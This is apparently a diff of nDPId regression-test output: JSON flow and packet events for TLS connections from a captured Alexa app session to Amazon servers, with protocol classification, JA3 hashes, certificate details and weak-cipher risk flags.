+00859{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2622,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":139,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976177116,"flow_last_seen":1490976177233,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":207,"flow_tot_l4_payload_len":207,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1490976177233,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":50796,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00859{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2623,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":140,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976177116,"flow_last_seen":1490976177235,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":207,"flow_tot_l4_payload_len":207,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1490976177235,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":50797,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2624,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":142,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976177276,"flow_last_seen":1490976177276,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976177276,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":50799,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2624,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":142,"flow_packet_id":1,"flow_last_seen":1490976177276,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976177276,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8ZidAAEAGqgusECrYNu8cssZvAbuB1uWoAAAAAKAC\/\/9pRgAAAgQFtAQCCAoA9oOPAAAAAAEDAwg="} 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2625,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":142,"flow_packet_id":2,"flow_last_seen":1490976177409,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976177409,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwnrRAAOcGyok27xyyrBAq2AG7xm8x5Gl6gdblqXASH\/5ueAAAAgQFtAEDAwY="} -01632{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2628,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":139,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976177116,"flow_last_seen":1490976177411,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":3472,"flow_avg_l4_payload_len":496,"midstream":0,"thread_ts_msec":1490976177411,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":50796,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","server_names":"pitangui.amazon.com,guipitan.amazon.com,alexa.amazon.com,echo.amazon.com,alexa.amazon.ca,guipitan.amazon.ca,alexa.amazon.co.jp,guipitan.amazon.co.jp,alexa.amazon.com.mx,guipitan.amazon.com.mx,alexa.amazon.com.br,guipitan.amazon.com.br,alexa.amazon.com.au,guipitan.amazon.com.au,alexa.amazon.cn,guipitan.amazon.cn","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=pitangui.amazon.com","alpn":"h2,http\/1.1","fingerprint":"13:E9:3B:22:22:61:41:53:CA:B6:3A:AE:C8:B7:23:FB:A5:11:2F:24"}} -01632{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2631,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":140,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976177116,"flow_last_seen":1490976177412,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":3472,"flow_avg_l4_payload_len":496,"midstream":0,"thread_ts_msec":1490976177412,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":50797,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","server_names":"pitangui.amazon.com,guipitan.amazon.com,alexa.amazon.com,echo.amazon.com,alexa.amazon.ca,guipitan.amazon.ca,alexa.amazon.co.jp,guipitan.amazon.co.jp,alexa.amazon.com.mx,guipitan.amazon.com.mx,alexa.amazon.com.br,guipitan.amazon.com.br,alexa.amazon.com.au,guipitan.amazon.com.au,alexa.amazon.cn,guipitan.amazon.cn","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=pitangui.amazon.com","alpn":"h2,http\/1.1","fingerprint":"13:E9:3B:22:22:61:41:53:CA:B6:3A:AE:C8:B7:23:FB:A5:11:2F:24"}} +01632{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2628,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":139,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976177116,"flow_last_seen":1490976177411,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":3472,"flow_avg_l4_payload_len":496,"midstream":0,"thread_ts_msec":1490976177411,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":50796,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","server_names":"pitangui.amazon.com,guipitan.amazon.com,alexa.amazon.com,echo.amazon.com,alexa.amazon.ca,guipitan.amazon.ca,alexa.amazon.co.jp,guipitan.amazon.co.jp,alexa.amazon.com.mx,guipitan.amazon.com.mx,alexa.amazon.com.br,guipitan.amazon.com.br,alexa.amazon.com.au,guipitan.amazon.com.au,alexa.amazon.cn,guipitan.amazon.cn","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=pitangui.amazon.com","alpn":"h2,http\/1.1","fingerprint":"13:E9:3B:22:22:61:41:53:CA:B6:3A:AE:C8:B7:23:FB:A5:11:2F:24"}} +01632{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2631,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":140,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976177116,"flow_last_seen":1490976177412,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":3472,"flow_avg_l4_payload_len":496,"midstream":0,"thread_ts_msec":1490976177412,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":50797,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","server_names":"pitangui.amazon.com,guipitan.amazon.com,alexa.amazon.com,echo.amazon.com,alexa.amazon.ca,guipitan.amazon.ca,alexa.amazon.co.jp,guipitan.amazon.co.jp,alexa.amazon.com.mx,guipitan.amazon.com.mx,alexa.amazon.com.br,guipitan.amazon.com.br,alexa.amazon.com.au,guipitan.amazon.com.au,alexa.amazon.cn,guipitan.amazon.cn","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=pitangui.amazon.com","alpn":"h2,http\/1.1","fingerprint":"13:E9:3B:22:22:61:41:53:CA:B6:3A:AE:C8:B7:23:FB:A5:11:2F:24"}} 00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2632,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":142,"flow_packet_id":3,"flow_last_seen":1490976177416,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976177416,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoZihAAEAGqh6sECrYNu8cssZvAbuB1uWpMeRpe1AQAVe46QAA"} -00859{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2637,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":142,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976177276,"flow_last_seen":1490976177419,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":207,"flow_tot_l4_payload_len":207,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1490976177419,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":50799,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -01632{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2644,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":142,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976177276,"flow_last_seen":1490976177553,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":3472,"flow_avg_l4_payload_len":496,"midstream":0,"thread_ts_msec":1490976177553,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":50799,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","server_names":"pitangui.amazon.com,guipitan.amazon.com,alexa.amazon.com,echo.amazon.com,alexa.amazon.ca,guipitan.amazon.ca,alexa.amazon.co.jp,guipitan.amazon.co.jp,alexa.amazon.com.mx,guipitan.amazon.com.mx,alexa.amazon.com.br,guipitan.amazon.com.br,alexa.amazon.com.au,guipitan.amazon.com.au,alexa.amazon.cn,guipitan.amazon.cn","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=pitangui.amazon.com","alpn":"h2,http\/1.1","fingerprint":"13:E9:3B:22:22:61:41:53:CA:B6:3A:AE:C8:B7:23:FB:A5:11:2F:24"}} +00859{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2637,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":142,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976177276,"flow_last_seen":1490976177419,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":207,"flow_tot_l4_payload_len":207,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1490976177419,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":50799,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +01632{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2644,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":142,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976177276,"flow_last_seen":1490976177553,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":3472,"flow_avg_l4_payload_len":496,"midstream":0,"thread_ts_msec":1490976177553,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":50799,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","server_names":"pitangui.amazon.com,guipitan.amazon.com,alexa.amazon.com,echo.amazon.com,alexa.amazon.ca,guipitan.amazon.ca,alexa.amazon.co.jp,guipitan.amazon.co.jp,alexa.amazon.com.mx,guipitan.amazon.com.mx,alexa.amazon.com.br,guipitan.amazon.com.br,alexa.amazon.com.au,guipitan.amazon.com.au,alexa.amazon.cn,guipitan.amazon.cn","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=pitangui.amazon.com","alpn":"h2,http\/1.1","fingerprint":"13:E9:3B:22:22:61:41:53:CA:B6:3A:AE:C8:B7:23:FB:A5:11:2F:24"}} 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2670,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":141,"flow_packet_id":2,"flow_last_seen":1490976178110,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976178110,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8lfxAAEAGejasECrYNu8cssZuAbts9RaEAAAAAKAC\/\/9M+QAAAgQFtAQCCAoA9oPjAAAAAAEDAwg="} 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2672,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":141,"flow_packet_id":3,"flow_last_seen":1490976178284,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976178284,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAww9ZAAOcGpWc27xyyrBAq2AG7xm5KXM+cbPUWhXASH\/7T5AAAAgQFtAEDAwY="} 00446{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2680,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":58,"flow_packet_id":2,"flow_last_seen":1490976180796,"flow_idle_time":620000,"pkt_oversize":false,"pkt_caplen":46,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":38,"pkt_len":46,"pkt_l4_len":8,"thread_ts_msec":1490976180796,"pkt":"AQBeAAABAMDKkaPvCABGwAAgAABAAAECBBcAAAAA4AAAAZQEAAARZO6bAAAAAA=="} -00593{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2681,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":19,"flow_first_seen":1490976054009,"flow_last_seen":1490976055604,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1146,"flow_tot_l4_payload_len":3565,"flow_avg_l4_payload_len":187,"midstream":0,"thread_ts_msec":1490976180796,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45687,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2681,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1490976057977,"flow_last_seen":1490976058806,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4791,"flow_avg_l4_payload_len":239,"midstream":0,"thread_ts_msec":1490976180796,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45688,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2681,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":19,"flow_first_seen":1490976058103,"flow_last_seen":1490976058813,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4709,"flow_avg_l4_payload_len":247,"midstream":0,"thread_ts_msec":1490976180796,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34041,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00810{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2681,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":57,"flow_state":"finished","flow_packets_processed":19,"flow_first_seen":1490976054009,"flow_last_seen":1490976055604,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1146,"flow_tot_l4_payload_len":3565,"flow_avg_l4_payload_len":187,"midstream":0,"thread_ts_msec":1490976180796,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45687,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} +00810{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2681,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":59,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1490976057977,"flow_last_seen":1490976058806,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4791,"flow_avg_l4_payload_len":239,"midstream":0,"thread_ts_msec":1490976180796,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45688,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} +00697{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2681,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":60,"flow_state":"finished","flow_packets_processed":19,"flow_first_seen":1490976058103,"flow_last_seen":1490976058813,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4709,"flow_avg_l4_payload_len":247,"midstream":0,"thread_ts_msec":1490976180796,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34041,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2681,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":143,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976186164,"flow_last_seen":1490976186164,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976186164,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":50800,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2681,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":143,"flow_packet_id":1,"flow_last_seen":1490976186164,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976186164,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8hhtAAEAGihesECrYNu8cssZwAbtODwEcAAAAAKAC\/\/9+IQAAAgQFtAQCCAoA9ocHAAAAAAEDAwg="} 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2682,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":143,"flow_packet_id":2,"flow_last_seen":1490976186394,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976186394,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwCmJAAOcGXtw27xyyrBAq2AG7xnDcplSHTg8BHXASH\/7w+wAAAgQFtAEDAwY="} 00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2683,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":143,"flow_packet_id":3,"flow_last_seen":1490976186398,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976186398,"pkt":"AMDKkaPvePiC0\/vCCABFAAAohhxAAEAGiiqsECrYNu8cssZwAbtODwEd3KZUiFAQAVc7bQAA"} -00859{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2684,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":143,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976186164,"flow_last_seen":1490976186398,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":207,"flow_tot_l4_payload_len":207,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1490976186398,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":50800,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -01632{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2687,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":143,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976186164,"flow_last_seen":1490976186551,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":3472,"flow_avg_l4_payload_len":496,"midstream":0,"thread_ts_msec":1490976186551,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":50800,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","server_names":"pitangui.amazon.com,guipitan.amazon.com,alexa.amazon.com,echo.amazon.com,alexa.amazon.ca,guipitan.amazon.ca,alexa.amazon.co.jp,guipitan.amazon.co.jp,alexa.amazon.com.mx,guipitan.amazon.com.mx,alexa.amazon.com.br,guipitan.amazon.com.br,alexa.amazon.com.au,guipitan.amazon.com.au,alexa.amazon.cn,guipitan.amazon.cn","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=pitangui.amazon.com","alpn":"h2,http\/1.1","fingerprint":"13:E9:3B:22:22:61:41:53:CA:B6:3A:AE:C8:B7:23:FB:A5:11:2F:24"}} +00859{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2684,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":143,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976186164,"flow_last_seen":1490976186398,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":207,"flow_tot_l4_payload_len":207,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1490976186398,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":50800,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 